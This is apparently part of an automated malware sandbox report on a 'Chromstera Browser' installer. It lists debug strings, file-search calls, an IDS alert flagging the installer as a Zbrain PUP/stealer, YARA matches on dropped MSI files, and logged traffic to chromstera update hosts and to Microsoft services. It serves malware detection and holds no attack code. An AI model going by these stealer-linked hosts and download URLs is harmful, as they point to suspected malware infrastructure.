                      Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\Updater.pdb source: ChromsteraUpdater.exe, 00000008.00000000.1793999764.00000000001A8000.00000002.00000001.01000000.0000000C.sdmp, ChromsteraUpdater.exe, 00000008.00000002.1810635597.00000000001A8000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbR source: powershell.exe, 00000006.00000002.1833673011.000002526E2D6000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdbC source: setup.exe, MSI4739.tmp.1.dr, MSIFB77.tmp.1.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbfi source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000006.00000002.1831930535.000002526E104000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: setup.exe, Chromnius-Main.msi.0.dr
                      Source: Binary string: on.pdb source: powershell.exe, 00000006.00000002.1831930535.000002526E09C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089q8 source: powershell.exe, 00000006.00000002.1831930535.000002526E104000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000006.00000002.1831930535.000002526E09C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1829332042.000002526C18F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbm source: setup.exe, MSI3250.tmp.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: \Sre.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb89+&| source: powershell.exe, 00000006.00000002.1831930535.000002526E104000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: setup.exe
                      Source: Binary string: System.Management.Automation.pdblb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\aischeduler2.pdb source: setup.exe, MSICC66.tmp.1.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: setup.exe, MSIEC26.tmp.1.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdblat* source: powershell.exe, 00000006.00000002.1831930535.000002526E09C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb[ source: powershell.exe, 00000006.00000002.1831930535.000002526E129000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbd50a source: powershell.exe, 00000006.00000002.1831930535.000002526E129000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E313000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\tempFiles.pdb) source: setup.exe, MSI35A6.tmp.0.dr, tempFiles.dll.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: \??\C:\Windows\dll\System.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdb source: setup.exe, MSI4739.tmp.1.dr, MSIFB77.tmp.1.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb'iM source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbtionmw source: powershell.exe, 00000006.00000002.1831930535.000002526E129000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ion.pdb source: powershell.exe, 00000006.00000002.1829332042.000002526C18F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wininet.pdbUGP source: setup.exe, 00000000.00000003.1719958497.0000000005251000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000003.00000003.1746421738.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, shi3105.tmp.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: setup.exe, MSI3250.tmp.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: setup.exe, lzmaextractor.dll.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: setup.exe, MSI3193.tmp.0.dr, MSICBB9.tmp.1.dr, MSICA7D.tmp.1.dr, MSI331F.tmp.0.dr, MSI35E5.tmp.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\tempFiles.pdb source: setup.exe, MSI35A6.tmp.0.dr, tempFiles.dll.0.dr, Chromnius-Main.msi.0.dr
                      Source: C:\Users\user\Desktop\setup.exe File opened: z:
                      Source: C:\Users\user\Desktop\setup.exe File opened: x:
                      Source: C:\Users\user\Desktop\setup.exe File opened: v:
                      Source: C:\Users\user\Desktop\setup.exe File opened: t:
                      Source: C:\Users\user\Desktop\setup.exe File opened: r:
                      Source: C:\Users\user\Desktop\setup.exe File opened: p:
                      Source: C:\Users\user\Desktop\setup.exe File opened: n:
                      Source: C:\Users\user\Desktop\setup.exe File opened: l:
                      Source: C:\Users\user\Desktop\setup.exe File opened: j:
                      Source: C:\Users\user\Desktop\setup.exe File opened: h:
                      Source: C:\Users\user\Desktop\setup.exe File opened: f:
                      Source: C:\Users\user\Desktop\setup.exe File opened: b:
                      Source: C:\Users\user\Desktop\setup.exe File opened: y:
                      Source: C:\Users\user\Desktop\setup.exe File opened: w:
                      Source: C:\Users\user\Desktop\setup.exe File opened: u:
                      Source: C:\Users\user\Desktop\setup.exe File opened: s:
                      Source: C:\Users\user\Desktop\setup.exe File opened: q:
                      Source: C:\Users\user\Desktop\setup.exe File opened: o:
                      Source: C:\Users\user\Desktop\setup.exe File opened: m:
                      Source: C:\Users\user\Desktop\setup.exe File opened: k:
                      Source: C:\Users\user\Desktop\setup.exe File opened: i:
                      Source: C:\Users\user\Desktop\setup.exe File opened: g:
                      Source: C:\Users\user\Desktop\setup.exe File opened: e:
                      Source: C:\Windows\System32\cmd.exe File opened: c:
                      Source: C:\Users\user\Desktop\setup.exe File opened: a:
                      Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00CCBDA0 FindFirstFileW,GetLastError,FindClose,0_2_00CCBDA0
                      Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00BC2290 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,PathIsUNCW,0_2_00BC2290
                      Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00CCB3A0 _wcsrchr,_wcsrchr,FindFirstFileW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,_wcsrchr,0_2_00CCB3A0
                      Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_00CCB7D0 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,GetFileAttributesW,FindNextFileW,0_2_00CCB7D0
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe Code function: 8_2_000DEAA0 GetLastError,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindClose,8_2_000DEAA0
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe Code function: 8_2_00184E5C FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_00184E5C

                      Networking

                      Source: Network traffic Suricata IDS: 2829202 - Severity 1 - ETPRO MALWARE MSIL/Zbrain PUP/Stealer Installer UA : 192.168.2.4:49734 -> 104.21.8.139:443
                      Source: Yara match File source: C:\Windows\Installer\6bc77d.msi, type: DROPPED
                      Source: Yara match File source: C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main.msi, type: DROPPED
                      Source: global traffic TCP traffic: 192.168.2.4:59151 -> 1.1.1.1:53
                      Source: global traffic HTTP traffic detected: GET /cross/crx3dynamic/?adv=426&v=4.4&time=1730139128 HTTP/1.1 Host: secure.chromstera.com Connection: Keep-Alive
                      Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
                      Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
                      Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                      Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
                      Source: unknown TCP traffic detected without corresponding DNS query: 4.245.163.56
                      Source: unknown TCP traffic detected without corresponding DNS query: 199.232.214.172
                      Source: unknown TCP traffic detected without corresponding DNS query: 151.101.130.133
                      Source: unknown TCP traffic detected without corresponding DNS query: 151.101.194.133
                      Source: unknown TCP traffic detected without corresponding DNS query: 13.107.253.45
                      Source: global traffic HTTP traffic detected: GET /download/updates.txt HTTP/1.1 Accept: */* User-Agent: AdvancedInstaller Host: chromsteraupdates.com Connection: Keep-Alive Cache-Control: no-cache
                      Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pUkVGK2e4kgEmE9&MD=mNzcmBgT HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
                      Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
                      Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pUkVGK2e4kgEmE9&MD=mNzcmBgT HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
                      Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
